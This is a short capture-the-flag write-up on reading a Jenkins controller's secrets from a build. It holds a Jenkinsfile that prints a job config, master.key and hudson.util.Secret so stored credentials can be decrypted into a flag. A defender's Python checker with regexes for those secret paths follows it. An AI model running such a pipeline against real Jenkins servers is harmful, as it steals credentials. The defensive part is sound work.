Jenkins doesn't provide any sort of sandboxing, but it tells you your build runs in `/var/jenkins_home/jobs/...`.
You can modify the `Jenkinsfile` to enumerate `/var/jenkins_home`, using `find` or whatever else.
From this we're able to read all the config files, including the one for secure jobs in `/var/jenkins_home/jobs/secure-jobs/config.xml`.
The credentials in here are encrypted, but since we're able to read everything Jenkins can, we can find the key. I found [this](https://github.com/hoto/jenkins-credentials-decryptor) tool to do so.
This `Jenkinsfile` gets everything we need for decryption.
```
pipeline {
    agent any
    stages {
        stage('build') {
            steps {
                sh 'cat /var/jenkins_home/jobs/secure-jobs/config.xml'
                sh 'cat /var/jenkins_home/secrets/master.key'
                sh 'cat /var/jenkins_home/secrets/hudson.util.Secret | base64'
            }
        }
    }
}
```
Then we simply feed everything into the decryptor to get `punk_{GBI3BZOA3E8USYUH}`.
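For defenders, the two conditions this relies on can be checked: builds are allowed to run on the controller, and a `Jenkinsfile` references files under `/var/jenkins_home`. The following is an added example, not part of the original write-up or of Jenkins; the function names and sample inputs are constructed, and it assumes the controller's top-level `config.xml` carries the usual `<numExecutors>` element.

```python
import re
import xml.etree.ElementTree as ET

# Paths the write-up reads from the controller's home directory.
SENSITIVE = [
    re.compile(r"/var/jenkins_home/secrets/[\w.\-]+"),
    re.compile(r"/var/jenkins_home/jobs/[\w.\-]+/config\.xml"),
]

def controller_runs_builds(config_xml: str) -> bool:
    """True if the controller's config.xml leaves executors on the built-in node."""
    # Jenkins writes an XML 1.1 declaration; strip it so the XML 1.0 parser accepts the file.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", config_xml)
    node = ET.fromstring(body).find("numExecutors")
    # Missing element: report it as enabled so that a human reviews the setting.
    return node is None or int(node.text.strip()) > 0

def flag_jenkinsfile(text: str) -> list[tuple[int, str]]:
    """Return (line number, matched path) for each sensitive path referenced."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for pattern in SENSITIVE:
            for match in pattern.finditer(line):
                hits.append((lineno, match.group(0)))
    return hits

# Constructed samples (not taken from a real controller or repository).
SAMPLE_CONFIG = """<?xml version='1.1' encoding='UTF-8'?>
<hudson>
  <numExecutors>2</numExecutors>
</hudson>"""

SAMPLE_JENKINSFILE = """pipeline {
  agent any
  stages { stage('build') { steps {
    sh 'make test'
    sh 'cat /var/jenkins_home/secrets/master.key'
  } } }
}"""

if __name__ == "__main__":
    print("controller runs builds:", controller_runs_builds(SAMPLE_CONFIG))
    for lineno, path in flag_jenkinsfile(SAMPLE_JENKINSFILE):
        print(f"line {lineno}: reads {path}")
```

Setting the built-in node's executor count to 0 and running builds on separate agents keeps job code away from `secrets/` altogether; the path scan is only a review aid and will not catch obfuscated paths.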